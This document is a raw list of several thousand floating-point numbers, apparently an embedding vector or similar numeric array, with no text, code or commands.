0.012680738233029842, -0.020053599029779434, 0.018555760383605957, 0.0064203510992228985, 0.02091158553957939, -0.01621447689831257, -0.01387319341301918, -0.008398081175982952, -0.012048156000673771, -0.024038143455982208, -0.0009679606300778687, -0.021536896005272865, -0.018250374123454094, 0.0004912513541057706, -0.02767367660999298, -0.024198107421398163, -0.00015496458217967302, 0.026103125885128975, -0.004911604803055525, 0.013800482265651226, 0.01935557648539543, -0.0074201226234436035, -0.017348762601614, 0.047407347708940506, -0.023979974910616875, -0.01509473193436861, -0.017174256965517998, 0.0013715047389268875, -0.01829400099813938, 0.010652110911905766, 0.0010088604176416993, 0.028895214200019836, -0.010659382678568363, 0.001435126643627882, 0.00642398651689291, -0.016897955909371376, -0.005660524591803551, 0.02421264909207821, -0.01720334216952324, 0.014294914901256561, 0.011408302001655102, 0.0017950442852452397, 0.0034373963717371225, -0.0034083120990544558, -0.003882749006152153, 0.039874523878097534, -0.0068238950334489346, 0.021755028516054153, 0.026306714862585068, 0.013895006850361824, 0.021260596811771393, -0.006867521442472935, 0.02112971618771553, -0.011430115438997746, -0.009728685952723026, -0.033679574728012085, 0.0026230369694530964, 0.00009827299800235778, -0.008368996903300285, -0.005235167220234871, 0.012091781944036484, 0.009881378151476383, -0.016025429591536522, 0.018381254747509956, -0.0009797761449590325, 0.015196527354419231, 0.007620076648890972, -0.03594814985990524, -0.025317851454019547, 0.014345812611281872, 0.02413993887603283, -0.013509640470147133, -0.0048970626667141914, -0.0107975322753191, -0.000815268256701529, 0.031730931252241135, 0.01996634714305401, 0.03475569561123848, -0.030451223254203796, 0.0001257667172467336, 0.001932285726070404, -0.0028229912277311087, 0.0010706643806770444, 0.03298155218362808, -0.018323086202144623, -0.02187136560678482, 0.015501911751925945, 0.0067548202350735664, 0.01390954852104187, 0.00027175608556717634, -0.0000937285803956911, 0.002632125746458769, -0.03283613175153732, -0.014840245246887207, 0.014731178991496563, -0.012026342563331127, -0.0389438271522522, 0.019762756302952766, 0.029156973585486412, -0.01302247866988182, -0.01649077609181404, 0.01194636058062315, 0.009714143350720406, -0.0023649141658097506, 0.0017632334493100643, 0.0030193100683391094, 0.012389895506203175, -0.03935100883245468, 0.048076286911964417, -0.011081104166805744, 0.037286024540662766, -0.02233671396970749, 0.00804906990379095, 0.013233339414000511, -0.017872279509902, -0.01631627045571804, 0.013684145174920559, 0.013865922577679157, -0.014178577810525894, -0.019021106883883476, 0.00881253182888031, -0.01479661837220192, -0.015152900479733944, -0.03554096817970276, -0.0198209248483181, 0.010419436730444431, 0.012964310124516487, 0.005002493038773537, 0.00982320960611105, 0.002966594882309437, 0.011255609802901745, -0.03684975951910019, 0.018032243475317955, 0.011401031166315079, -0.011720958165824413, 0.01777048408985138, -0.005504196509718895, -0.014716637320816517, -0.00022244916181080043, -0.0110592907294631, -0.02095521055161953, 0.04470251128077507, -0.023281952366232872, 0.00007094969623722136, -0.0110592907294631, -0.021246053278446198, 0.019021106883883476, -0.008994308300316334, -0.018308542668819427, -0.0032974283676594496, 0.01985001005232334, -0.005231531802564859, 0.014374896883964539, -0.008012714795768261, 0.04048529267311096, 0.07189629971981049, -0.019806383177638054, -0.03344690054655075, -0.012826159596443176, -0.01460030023008585, -0.02905517816543579, 0.012789804488420486, -0.009721415117383003, 0.016679825261235237, -0.017421472817659378, 0.016258101910352707, 0.006064068991690874, -0.008114509284496307, 0.02530330792069435, -0.0033392368350178003, -0.0011461017420515418, -0.010266744531691074, 0.01893385499715805, 0.026728438213467598, -0.0052206250838935375, 0.015080190263688564, 0.0004264934395905584, 0.0111465435475111, -0.0067257359623909, 0.027281038463115692, -0.02448894828557968, -0.007809124421328306, -0.03865298628807068, -0.021333307027816772, -0.012586214579641819, 0.004795267712324858, 0.004159049596637487, -0.013211525976657867, -0.023020192980766296, 0.017246967181563377, 0.012099053710699081, 0.009779583662748337, -0.0030811140313744545, 0.000653487048111856, -0.022802062332630157, -0.006569407880306244, -0.017363304272294044, -0.009990444406867027, -0.0003969547396991402, 0.01003407035022974, 0.014411251991987228, 0.03670433908700943, 0.008005443029105663, -0.009437843225896358, 0.01392409112304449, 0.02438715472817421, -0.0290260948240757, 0.03458118811249733, -0.018599385395646095, 0.00689297029748559, -0.018221290782094002, -0.0046898373402655125, -0.0012469877256080508, -0.009408758953213692, 0.01385865081101656, 0.0054024020209908485, 0.01572004333138466, -0.00969960168004036, -0.010383081622421741, -0.008594399318099022, -0.015254695899784565, -0.004628033377230167, -0.004435350187122822, -0.01967550441622734, 0.007590992376208305, 0.01072482205927372, -0.007889105938374996, -0.0005180634325370193, -0.00003820149868261069, 0.014556673355400562, 0.013422387652099133, 0.005664160009473562, 0.0199954304844141, -0.017915906384587288, -0.014782076701521873, 0.007401945069432259, 0.0018650282872840762, -0.009801396168768406, 0.022772977128624916, -0.013596892356872559, 0.029505984857678413, -0.0074455710127949715, -0.013756856322288513, 0.01185910776257515, 0.0044280788861215115, -0.002632125746458769, 0.02105700597167015, 0.017421472817659378, 0.006802082061767578, 0.022002244368195534, 0.03033488616347313, -0.0030629364773631096, -0.016505319625139236, -0.0311492457985878, -0.017566895112395287, -0.010128594934940338, -0.0066093988716602325, -0.004420808050781488, -0.006594856735318899, 0.017901362851262093, 0.021638691425323486, -0.008339912630617619, 0.019486455246806145, 0.019195612519979477, -0.013342405669391155, -0.03167276084423065, -0.03975818678736687, -0.012535316869616508, -0.012506232596933842, -0.03330148011445999, 0.014578486792743206, 0.013175170868635178, 0.009277880191802979, -0.0052933357656002045, -0.020591657608747482, -0.00863802619278431, 0.00782366655766964, 0.020199021324515343, 0.001200634753331542, 0.004089974332600832, 0.004049983806908131, -0.00909610278904438, -0.02396543323993683, 0.023136530071496964, 0.012462606653571129, 0.024590743705630302, 0.004020899534225464, 0.01305883377790451, 0.009030663408339024, 0.009728685952723026, -0.016403524205088615, 0.019384661689400673, 0.03376682847738266, 0.00026448501739650965, 0.021042464300990105, -0.019791841506958008, 0.03405767306685448, 0.010441250167787075, 0.011262880638241768, 0.0010988397989422083, -0.0005248800734989345, 0.001278798677958548, 0.021725943312048912, -0.017188798636198044, 0.047407347708940506, 0.01851213350892067, -0.01989363506436348, 0.010470334440469742, 0.018148580566048622, 0.016723450273275375, -0.014345812611281872, 0.015618248842656612, 0.0007434664876200259, 0.027033822610974312, 0.041997674852609634, 0.01900656521320343, 0.006376724690198898, 0.02725195325911045, -0.016999751329421997, -0.004082703497260809, 0.04161958023905754, 0.0032083578407764435, -0.044935185462236404, -0.027615508064627647, -0.020053599029779434, 0.01567641831934452, 0.00026675721164792776, 0.0019450100371614099, 0.012142679654061794, 0.0036446216981858015, 0.00463530421257019, 0.009917733259499073, -0.00032242632005363703, 0.026132209226489067, -0.005198812112212181, -0.010535773821175098, 0.010557587258517742, 0.011568265035748482, 0.010433979332447052, 0.00992500502616167, -0.0033646856900304556, 0.006518510170280933, 0.0030374876223504543, -0.03588997945189476, 0.022554846480488777, 0.0006030439981259406, 0.04900698363780975, -0.0015660057542845607, -0.018599385395646095, -0.001653258572332561, 0.005551458802074194, 0.004391723778098822, -0.014840245246887207, -0.0026939299423247576, 0.03504653647542, 0.008674381300807, -0.004766183439642191, 0.0027811825275421143, 0.004693472757935524, 0.006082246545702219, -0.017014293000102043, -0.010135865770280361, 0.004780725575983524, -0.011706415563821793, -0.022627556696534157, 0.007830937393009663, 0.01460030023008585, -0.016752535477280617, -0.024692539125680923, 0.004129965323954821, -0.004144507460296154, -0.015298321843147278, -0.024328986182808876, 0.024198107421398163, 0.005129736848175526, -0.01083388738334179, 0.0325743742287159, 0.005725964438170195, 0.01670890860259533, -0.029753200709819794, 0.028924299404025078, 0.03144008666276932, -0.03213810920715332, 0.014396710321307182, -0.008136322721838951, -0.010099510662257671, 0.021740486845374107, -0.008703465573489666, 0.0012488055508583784, -0.008187219500541687, -0.028895214200019836, 0.0034264896530658007, 0.0005430577439256012, -0.00774368504062295, 0.0034155831672251225, -0.008332640863955021, 0.0033646856900304556, -0.016621656715869904, 0.0027339207008481026, -0.000862984627019614, -0.00031538246548734605, -0.01109564583748579, -0.01518198475241661, -0.012520775198936462, 0.01653440296649933, -0.015152900479733944, 0.008325370028614998, 0.0035610042978078127, -0.02021356299519539, -0.00591864762827754, -0.007816395722329617, 0.020373525097966194, 0.010419436730444431, -0.004809809848666191, 0.006009535863995552, 0.015981802716851234, -0.009234253317117691, 0.016127223148941994, 0.025710487738251686, -0.004620762076228857, 0.022729352116584778, -0.007765498012304306, -0.019341034814715385, -0.0016596207860857248, 0.022554846480488777, 0.020577115938067436, 0.01187365036457777, 0.008187219500541687, -0.0032883393578231335, -0.008623483590781689, -0.0016587118152529001, -0.016868872568011284, -0.0016887050587683916, 0.010579400695860386, 0.008499875664710999, -0.019631877541542053, 0.05907013639807701, 0.004987950902432203, -0.04385906830430031, -0.0003705971175804734, -0.027586422860622406, -0.022220376878976822, 0.004046347923576832, -0.0072928788140416145, -0.030771149322390556, -0.010194034315645695, 0.0045625935308635235, -0.040398042649030685, -0.008536230772733688, 0.020795248448848724, 0.008936139754951, -0.013291507959365845, 0.0031792735680937767, 0.0019413745030760765, -0.0055369166657328606, 0.011844566091895103, 0.0032883393578231335, 0.019268324598670006, 0.005838665645569563, -0.02831353060901165, 0.0065475944429636, -0.009219711646437645, -0.0005671431426890194, 0.010615755803883076, -0.014949310570955276, 0.007020214106887579, -0.021784111857414246, -0.00860167108476162, 0.013393303379416466, -0.02102792263031006, -0.0026375791057944298, 0.0007339231669902802, 0.00020586204482242465, -0.015065647661685944, 0.012629841454327106, 0.001536012627184391, -0.015880007296800613, -0.010194034315645695, -0.009445114061236382, 0.021144259721040726, 0.013800482265651226, -0.010397624224424362, 0.0013869557296857238, 0.0006648480775766075, -0.026452137157320976, 0.009285151027143002, -0.0007384676137007773, 0.007990901358425617, -0.0032810682896524668, 0.015516454353928566, -0.005133372265845537, 0.022060412913560867, -0.026495764032006264, -0.018730266019701958, 0.0005248800734989345, -0.041997674852609634, -0.0029393283184617758, -0.014447607100009918, 0.0013360583689063787, 0.01663619838654995, 0.0033864988945424557, 0.022947482764720917, -0.0009370585903525352, 0.013524182140827179, -0.0396418496966362, -0.01992272026836872, -0.008216303773224354, 0.005856843199580908, 0.028546202927827835, 0.009779583662748337, -0.019486455246806145, -0.005467841401696205, -0.008092695847153664, 0.017712315544486046, -0.009277880191802979, -0.0031574603635817766, -0.00033333292230963707, -0.0024594380520284176, 0.002535784151405096, 0.007780040148645639, 0.0016696184175089002, 0.005776861682534218, 0.006416715681552887, 0.004904333967715502, -0.0157491285353899, 0.014520318247377872, 0.0060786111280322075, 0.02962232194840908, -0.004340826068073511, -0.024765249341726303, -0.004297199659049511, 0.028866130858659744, -0.040078114718198776, 0.002797542605549097, 0.002564868424087763, -0.0033428724855184555, 0.0010679378174245358, -0.015661874786019325, 0.006089517381042242, -0.019530082121491432, 0.00046625707182101905, -0.014869329519569874, 0.0011760948691517115, -0.02806631289422512, -0.011684602126479149, 0.012251745909452438, -0.011728229001164436, 0.008768904954195023, 0.013713229447603226, 0.017857737839221954, -0.009256066754460335, -0.012804347090423107, 0.015618248842656612, -0.03591906279325485, -0.005922283045947552, 0.013545995578169823, -0.005649617873132229, 0.0036391683388501406, 0.011720958165824413, -0.0013896824093535542, 0.01369868777692318, 0.007932732813060284, -0.017116088420152664, 0.015225611627101898, -0.0032501663081347942, 0.019835466518998146, -0.012404438108205795, 0.04272478073835373, -0.025186970829963684, -0.02204587124288082, -0.003575546434149146, -0.009815938770771027, 0.001312427339144051, 0.024968840181827545, 0.0037773186340928078, 0.027586422860622406, -0.011132001876831055, -0.013807754032313824, -0.0217695701867342, -0.005326055455952883, -0.02216220833361149, 0.021464185789227486, 0.010332183912396431, -0.030247632414102554, -0.01826491765677929, -0.006798446178436279, 0.007889105938374996, 0.015414658933877945, -0.009597806259989738, 0.010397624224424362, 0.01797407492995262, 0.0035101070534437895, 0.00007918645133031532, 0.010346726514399052, -0.0050315773114562035, 0.008761634118855, -0.007205625995993614, -0.013415115885436535, -0.0020177208352833986, 0.0009961359901353717, -0.01656348817050457, 0.001596907852217555, -0.010353997349739075, -0.02342737279832363, -0.015909092500805855, -0.003564639948308468, 0.005871385335922241, -0.0000835604514577426, 0.004057254642248154, -0.012222661636769772, -0.007700058631598949, 0.012557130306959152, 0.006605762988328934, -0.0028957019094377756, -0.0018795704236254096, -0.0023649141658097506, -0.026074040681123734, 0.024997923523187637, 0.007172906305640936, 0.01745055802166462, 0.012164493091404438, -0.0009688694844953716, 0.000971596164163202, 0.005137007683515549, 0.00034401228185743093, 0.03341781720519066, -0.011233796365559101, -0.0196464192122221, 0.006587585434317589, 0.014702094718813896, -0.015705501660704613, -0.005725964438170195, 0.007042027078568935, -0.017319679260253906, -0.01745055802166462, -0.0017341491766273975, 0.02120242826640606, -0.02796451933681965, 0.01939920336008072, 0.011830023489892483, 0.03176001459360123, -0.005180634092539549, 0.0025830459780991077, -0.01063756924122572, 0.006162228062748909, 0.009503282606601715, 0.005798674654215574, -0.0035391913261264563, -0.0029902257956564426, 0.0238927211612463, -0.01755235344171524, -0.01646169275045395, 0.03216719627380371, 0.002328558824956417, 0.0024103582836687565, 0.005097017157822847, 0.0065912208519876, 0.005191540811210871, 0.006838437169790268, -0.00796181708574295, 0.005802310537546873, -0.03176001459360123, -0.0038682068698108196, 0.015865465626120567, -0.021100632846355438, -0.0046898373402655125, 0.011510096490383148, -0.013720501214265823, 0.010332183912396431, 0.01178639754652977, 0.005547822918742895, -0.002988408086821437, 0.00502430647611618, 0.0012415344826877117, 0.008201762102544308, 0.011764584109187126, 0.005715057719498873, -0.0050133997574448586, -0.017697773873806, 0.004675295203924179, 0.014869329519569874, 0.007005671970546246, 0.013415115885436535, -0.016330813989043236, -0.0036555281840264797, 0.0003708243602886796, 0.0019377389689907432, -0.0006253116298466921, 0.009081561118364334, -0.007503739558160305, -0.009983173571527004, 0.02382001094520092, -0.01199725829064846, 0.002066800370812416, -0.013887735083699226, 0.0028684353455901146, -0.01727605238556862, -0.007438300177454948, 0.01801769994199276, -0.010862971656024456, 0.004864342976361513, -0.007252887822687626, -0.012891598977148533, -0.011597349308431149, -0.0025957704056054354, -0.0006493970286101103, 0.0017723222263157368, -0.011939089745283127, -0.013436929322779179, 0.00395545968785882, -0.011350133456289768, -0.0026684810873121023, 0.0015378303360193968, -0.008398081175982952, -0.0031574603635817766, -0.016519861295819283, 0.0040681613609194756, 0.007576450239866972, 0.0057441419921815395, 0.0036282618530094624, 0.023601878434419632, -0.0010034070583060384, 0.015036563389003277, -0.0008984310552477837, -0.01851213350892067, 0.020402610301971436, 0.0011379218194633722, -0.00927060842514038, -0.008943410590291023, -0.012382624670863152, 0.011757313273847103, 0.011742770671844482, -0.01084842998534441, 0.022991109639406204, 0.00034219451481476426, 0.023950889706611633, 0.00791091937571764, -0.003351961262524128, 0.0044244434684515, -0.0016069054836407304, -0.03100382350385189, 0.024125395342707634, -0.03670433908700943, 0.004151778295636177, -0.019762756302952766, 0.011546452529728413, 0.0048170811496675014, 0.007845479995012283, 0.02537601999938488, -0.011037477292120457, -0.015138358809053898, -0.02243850938975811, 0.011073833331465721, -0.004126329906284809, 0.024372611194849014, -0.004940689075738192, 0.019617335870862007, 0.012571672908961773, -0.0017068826127797365, -0.023049278184771538, 0.0014151311479508877, 0.02258392982184887, -0.018483048304915428, -0.0043553682044148445, -0.023660046979784966, -0.0005180634325370193, -0.005395130719989538, -0.005020671058446169, 0.007590992376208305, -0.008819802664220333, -0.018221290782094002, 0.005944096017628908, -0.00014894323248881847, -0.012375353835523129, -0.01298612356185913, 0.012629841454327106, -0.0260158721357584, -0.013640519231557846, 0.01992272026836872, -0.014265830628573895, 0.01502202171832323, 0.012877057306468487, -0.018046785145998, 0.005904105491936207, -0.017465099692344666, 0.005100652575492859, -0.014011343941092491, -0.002592134987935424, 0.017610520124435425, -0.007220168132334948, 0.025565067306160927, -0.0050133997574448586, -0.00860167108476162, 0.023311035707592964, 0.0009870472131296992, -0.009728685952723026, -0.00010673697397578508, -0.0111465435475111, -0.017319679260253906, 0.011052019894123077, 0.002077707089483738, 0.018948396667838097, 0.01297158095985651, -0.012048156000673771, 0.013160629197955132, 0.0339704193174839, -0.00003337305679451674, -0.005216989666223526, 0.014702094718813896, 0.02290385775268078, -0.01302247866988182, 0.02307836152613163, -0.010317642241716385, 0.002652121242135763, -0.0009266064153052866, 0.012891598977148533, 0.0006693924660794437, 0.00450442498549819, 0.006289471872150898, 0.010703008621931076, -0.006671202834695578, -0.006663931533694267, 0.01003407035022974, 0.0035391913261264563, 0.017654146999120712, 0.006605762988328934, -0.012011800892651081, -0.018395796418190002, 0.005467841401696205, -0.022351255640387535, -0.016868872568011284, -0.003737327642738819, -0.00804906990379095, -0.003497382625937462, -0.0014096779050305486, -0.00015735041233710945, 0.01698520965874195, -0.013524182140827179, -0.0022449414245784283, -0.009583264589309692, -0.0221185814589262, -0.00792546197772026, 0.010288557969033718, -0.005078839138150215, 0.0035900885704904795, 0.005700515583157539, 0.00242490042001009, 0.04051437973976135, -0.006631211843341589, 0.014803890138864517, -0.044266246259212494, -0.005296971183270216, 0.008259930647909641, -0.006722100079059601, 0.007336505223065615, -0.010608484968543053, -0.005111559294164181, 0.0010088604176416993, 0.007540095131844282, -0.004715286195278168, -0.013393303379416466, 0.0064457994885742664, -0.0009011576767079532, 0.0015460103750228882, 0.002206768374890089, 0.017174256965517998, -0.006827530451118946, 0.012891598977148533, -0.006453070789575577, -0.002535784151405096, -0.01051396131515503, 0.002044987166300416, -0.006227667909115553, 0.022234918549656868, 0.0028011780232191086, -0.009568721987307072, 0.012578943744301796, -0.005351504310965538, -0.005216989666223526, -0.017363304272294044, 0.011211982928216457, -0.01060121413320303, 0.003033852204680443, -0.008456249721348286, -0.0074455710127949715, 0.010179491713643074, -0.0009543273481540382, 0.010012257844209671, 0.00774368504062295, -0.000023687769498792477, -0.00492978235706687, 0.016679825261235237, -0.020853416994214058, -0.004231760278344154, -0.0013078829506412148, 0.014593028463423252, 0.01263711228966713, 0.00425720913335681, 0.004366274923086166, -0.01472390815615654, 0.0005121557042002678, -0.015400117263197899, 0.012077240273356438, -0.021071547642350197, 0.016025429591536522, -0.006362182553857565, 0.005460570100694895, 0.005813216790556908, -0.008819802664220333, 0.010099510662257671, 0.0008857066859491169, -0.016185391694307327, -0.013276966288685799, 0.006602127570658922, -0.008507146500051022, -0.0055005610920488834, 0.010128594934940338, 0.005944096017628908, 0.013655060902237892, 0.012353540398180485, 0.006093152798712254, 0.013705958612263203, -0.010906598530709743, -0.021042464300990105, 0.008078154176473618, -0.008819802664220333, -0.0009915916016325355, 0.020300814881920815, -0.007151092868298292, 0.0012133590644225478, -0.022540302947163582, 0.01925378106534481, -0.014825702644884586, -0.013269694522023201, -0.0011706416262313724, 0.01678161881864071, 0.0018441240536049008, -0.009292421862483025, 0.0007166544091887772, 0.02073707990348339, -0.013887735083699226, -0.015778211876749992, 0.01212086621671915, 0.021580522879958153, -0.011524639092385769, 0.0019231968326494098, 0.0056823380291461945, -0.017334220930933952, 0.013538723811507225, -0.01841033808887005, -0.0022885678336024284, -0.01755235344171524, 0.017363304272294044, -0.0032138109672814608, -0.016548944637179375, -0.008747092448174953, -0.023529168218374252, 0.0037736829835921526, -0.00548601895570755, 0.005707786418497562, 0.0033828632440418005, 0.009161543101072311, -0.006260387599468231, 0.00794727448374033, -0.006267658434808254, -0.00991046242415905, -0.001446942100301385, -0.013887735083699226, 0.009845023043453693, -0.0025230597238987684, 0.020838873460888863, -0.026553932577371597, 0.007252887822687626, 0.037460532039403915, 0.004242666997015476, 0.00638763140887022, -0.0024321714881807566, -0.009917733259499073, -0.000879344530403614, 0.010164950042963028, -0.013931361958384514, -0.0030356699135154486, -0.008718008175492287, 0.008914326317608356, -0.007092924788594246, -0.003502835985273123, 0.015734586864709854, -0.003006585640832782, -0.02041715197265148, 0.007107466459274292, -0.018701180815696716, -0.01564733311533928, 0.012506232596933842, -0.0038791135884821415, 0.020853416994214058, -0.01649077609181404, 0.002334012184292078, 0.02216220833361149, -0.0033937699627131224, -0.0012033613165840507, -0.001983183203265071, 0.006794810760766268, -0.0057695903815329075, -0.0037555054295808077, -0.011044749058783054, -0.009757770225405693, 0.011153814382851124, 0.005195176228880882, -0.006852979306131601, -0.009626890532672405, -0.013429658487439156, -0.0008066338486969471, -0.012091781944036484, -0.01925378106534481, -0.0066821095533668995, 0.001211541355587542, 0.015109274536371231, -0.002274025697261095, -0.009466927498579025, 0.009336048737168312, -0.006543959025293589, -0.014185849577188492, 0.006918419152498245, -0.015472827479243279, -0.010266744531691074, -0.021493270993232727, -0.015167443081736565, 0.015734586864709854, 0.017174256965517998, 0.004242666997015476, -0.011757313273847103, -0.013684145174920559, -0.00792546197772026, -0.033185143023729324, 0.007092924788594246, 0.01203361339867115, 0.004060890059918165, -0.012702551670372486, -0.0006857523694634438, -0.010194034315645695, -0.007201990578323603, 0.009757770225405693, 0.021493270993232727, 0.014396710321307182, -0.003090202808380127, -0.01617085002362728, 0.0039336467161774635, -0.0030247634276747704, 0.02265664003789425, 0.01564733311533928, -0.00583139481022954, 0.009510553441941738, 0.00017121087876148522, -0.012426251545548439, 0.002346736378967762, -0.008892512880265713, 0.0076346187852323055, 0.010470334440469742, 0.036326244473457336, 0.0073655894957482815, 0.026946568861603737, -0.001681433990597725, -0.021638691425323486, -0.0038791135884821415, 0.02608858421444893, 0.01067392434924841, 0.01646169275045395, 0.004268115386366844, 0.004377181641757488, 0.01678161881864071, -0.00014689825184177607, -0.00175414455588907, -0.015705501660704613, -0.024299900978803635, -0.0027848181780427694, 0.005624169483780861, -0.02789180725812912, 0.003090202808380127, -0.0056168981827795506, 0.0042935642413794994, -0.0030084033496677876, 0.005075203720480204, 0.00492978235706687, -0.011481013149023056, -0.005613262765109539, 0.000536241102963686, 0.002759369323030114, 0.016039971262216568, 0.02952052652835846, -0.011902734637260437, 0.011684602126479149, -0.02268572524189949, -0.011117459274828434, -0.005827758926898241, 0.008732549846172333, 0.02764459140598774, -0.0044826120138168335, -0.0325743742287159, 0.00404271250590682, -0.015400117263197899, -0.02112971618771553, 0.00082390260649845, 0.018134037032723427, 0.003357414621859789, -0.010870243422687054, -0.00888524204492569, 0.003502835985273123, -0.022772977128624916, -0.0005957729299552739, -0.005671431310474873, -0.011888192035257816, -0.021435102447867393, 0.010703008621931076, 0.020024515688419342, -0.024416238069534302, 0.010179491713643074, -0.012040885165333748, 0.003491929266601801, 0.0035900885704904795, 0.011204712092876434, -0.012491690926253796, -0.02559415064752102, -0.0006866612820886075, -0.007136550731956959, 0.000357645534677431, -0.006998400669544935, 0.005231531802564859, 0.012542588636279106, -0.005453299265354872, 0.013967717066407204, 0.007412851322442293, 0.010310371406376362, -0.021318765357136726, -0.02771730162203312, -0.003580999793484807, -0.02678660675883293, -0.016752535477280617, -0.021318765357136726, 0.0019977253396064043, 0.0032974283676594496, -0.018395796418190002, 0.007012942805886269, -0.020199021324515343, 0.016330813989043236, 0.02562323585152626, 0.0027575516141951084, -0.018497591838240623, -0.014025885611772537, 0.011590078473091125, 0.036268074065446854, -0.00966324657201767, -0.003490111557766795, 0.009088831953704357, 0.0074455710127949715, -0.012040885165333748, -0.002732102992013097, -0.01688341423869133, -0.014469420537352562, 0.00020290818065404892, 0.022307628765702248, -0.011291964910924435, -0.021827738732099533, 0.013393303379416466, 0.003948188852518797, -0.0021976795978844166, 0.01843942329287529, 0.01187365036457777, -0.005471476819366217, 0.0059586381539702415, 0.029811369255185127, 0.001580547890625894, -0.015909092500805855, -0.0011215618578717113, -0.03016038052737713, 0.006431257352232933, -0.0055005610920488834, 0.026990195736289024, 0.010993851348757744, -0.015632791444659233, -0.0007107466808520257, -0.0010915687307715416, 0.0014042245456948876, -0.010630298405885696, -0.0027502805460244417, -0.005984087008982897, 0.012528046034276485, 0.00820903293788433, 0.0024594380520284176, 0.003168366849422455, 0.00996136013418436, -0.0026612100191414356, 0.0024994288105517626, 0.032399870455265045, -0.009866836480796337, 0.022322172299027443, 0.016592571511864662, -0.003788225119933486, -0.010281287133693695, 0.024227190762758255, 0.015283780172467232, 0.013211525976657867, -0.021827738732099533, 0.009714143350720406, -0.003190180053934455, -0.008841616101562977, -0.007976358756422997, 0.006976587697863579, -0.02325286716222763, -0.008405352011322975, -0.010710279457271099, -0.00927060842514038, 0.007267429959028959, 0.004678930621594191, -0.008092695847153664, 0.024721622467041016, -0.016476234421133995, -0.008492604829370975, -0.017537809908390045, -0.011321049183607101, 0.02534693479537964, -0.012040885165333748, -0.0010297646513208747, 0.020446237176656723, -0.002652121242135763, 0.009721415117383003, 0.014338541775941849, 0.0033646856900304556, -0.010877514258027077, -0.027033822610974312, 0.020620742812752724, 0.0021813197527080774, -0.014767534099519253, -0.0021358756348490715, 0.003944552969187498, -0.010782990604639053, -0.01811949536204338, -0.00045739547931589186, -0.011779126711189747, 0.014978394843637943, 0.000020038034563185647, 0.006820259615778923, -0.0014987484319135547, -0.0010270379716530442, 0.03274887800216675, 0.014425794593989849, -0.005835030227899551, 0.0011924547143280506, 0.0035228312481194735, -0.006056797690689564, -0.004264479968696833, -0.012360811233520508, 0.0022976568434387445, 0.0008352636941708624, 0.005678702145814896, -0.03347598761320114, -0.02208949811756611, 0.0067548202350735664, 0.007881835103034973, -0.002155870897695422, -0.005191540811210871, 0.026946568861603737, 0.005856843199580908, 0.012448064051568508, 0.004809809848666191, -0.001396953477524221, -0.006074975244700909, 0.01759597845375538, 0.015429201535880566, 0.005042484030127525, 0.0010424890788272023, 0.015865465626120567, -0.0058786566369235516, -0.04065980017185211, 0.014498504810035229, -0.03344690054655075, -0.018453964963555336, -0.013204255141317844, -0.0009361496777273715, -0.009488740935921669, -0.0010252202628180385, -0.017406931146979332, 0.01272436510771513, -0.0003385589807294309, 0.04045620933175087, -0.0194719135761261, -0.001943192328326404, -0.009583264589309692, -0.01509473193436861, 0.025390561670064926, 0.02488158643245697, -0.017145173624157906, 0.016432607546448708, 0.0013442382914945483, -0.011102917604148388, -0.010070426389575005, 0.014483963139355183, -0.0047443704679608345, -0.0002949326008092612, 0.009386945515871048, -0.0019922719802707434, -0.013218797743320465, -0.00497340876609087, -0.008558044210076332, -0.005126101430505514, -0.006002264562994242, -0.016229018568992615, -0.010346726514399052, -0.006318556144833565, -0.0011406483827158809, 0.012869786471128464, 0.014905684627592564, -0.006809352897107601, 0.01582183875143528, 0.029316937550902367, -0.0033864988945424557, 0.00026902943500317633, -0.006867521442472935, -0.008012714795768261, 0.002866617636755109, 0.009067018516361713, -0.03036396950483322, 0.01691249944269657, 0.016083598136901855, -0.016825245693325996, -0.000015110183085198514, -0.011582807637751102, 0.005064297467470169, -0.004260844551026821, 0.0008370814612135291, 0.016927041113376617, -0.009408758953213692, -0.005358775611966848, -0.004827987402677536, -0.00446079857647419, 0.005206082947552204, 0.003657346125692129, -0.020853416994214058, 0.007263794541358948, -0.016403524205088615, 0.012484420090913773, -0.005566000938415527, -0.009285151027143002, 0.0001344011106994003, 0.010623026639223099, 0.01865755394101143, 0.005351504310965538, 0.002274025697261095, 0.0028975196182727814, 0.017014293000102043, 0.02438715472817421, -0.007481926586478949, 0.0020522582344710827, 0.005976816173642874, 0.008550773374736309, -0.008441707119345665, -0.00642398651689291, 0.008296285755932331, -0.006129508372396231, -0.022816604003310204, -0.01875934936106205, -0.005413308274000883, -0.007241981569677591, 0.018323086202144623, 0.017363304272294044, 0.007409215904772282, -0.012142679654061794, 0.00022301721037365496, -0.0008602579473517835, 0.0025066998787224293, -0.01755235344171524, 0.01907927542924881, 0.016025429591536522, -0.0027957246638834476, 0.0034792048390954733, 0.025506898760795593, -0.00900884997099638, -0.012288101017475128, 0.001697793835774064, -0.011030206456780434, -0.0010097692720592022, 0.02258392982184887, -0.008703465573489666, 0.009459656663239002, -0.0027121074963361025, 0.024750707671046257, 0.00048079920816235244, -0.009932275861501694, 0.007692787330597639, 0.011219254694879055, 0.0004071796720381826, -0.01653440296649933, 0.01713063009083271, 0.002786635886877775, 0.011052019894123077, -0.0030647541861981153, 0.021507812663912773, -0.013705958612263203, 0.005667795892804861, 0.006718464661389589, 0.011706415563821793, 0.03763503581285477, -0.008848886936903, -0.01631627045571804, 0.021827738732099533, 0.013982259668409824, 0.004002721514552832, -0.004569864831864834, 0.008070883341133595, -0.018061326816678047, -0.009474198333919048, 0.017901362851262093, -0.015472827479243279, 0.0023649141658097506, -0.018352169543504715, 0.009350590407848358, -0.0039009267929941416, 0.009437843225896358, 0.007129279896616936, -0.027281038463115692, -0.005002493038773537, -0.006100424099713564, -0.0058786566369235516, -0.004758912604302168, 0.0015550991520285606, -0.01169914472848177, -0.009794125333428383, 0.01060121413320303, 0.002464891178533435, -0.01157553680241108, 0.00265939231030643, -0.006369453389197588, 0.001513290568254888, 0.00034219451481476426, -0.0006657569319941103, -0.008434436284005642, 0.00898703746497631, 0.020969754084944725, -0.0011660971213132143, -0.038565732538700104, 0.003653710475191474, -0.006765726488083601, -0.006260387599468231, 0.011582807637751102, 0.0129206832498312, 0.008943410590291023, 0.00900884997099638, 0.03016038052737713, 0.0004071796720381826, 0.002686658874154091, -0.014651197008788586, 0.0002635761338751763, -0.0034064941573888063, -0.008463520556688309, 0.002417629351839423, -0.0018759348895400763, 0.00011037250806111842, 0.009256066754460335, -0.012389895506203175, -0.012528046034276485, 0.004966137930750847, -0.004369910340756178, 0.00007310829096240923, -0.010717551223933697, -0.0109720379114151, 0.010317642241716385, -0.006227667909115553, -0.013466013595461845, -0.006333098281174898, -0.010550316423177719, -0.0020468048751354218, -0.014789347536861897, -0.020867958664894104, -0.013407845050096512, 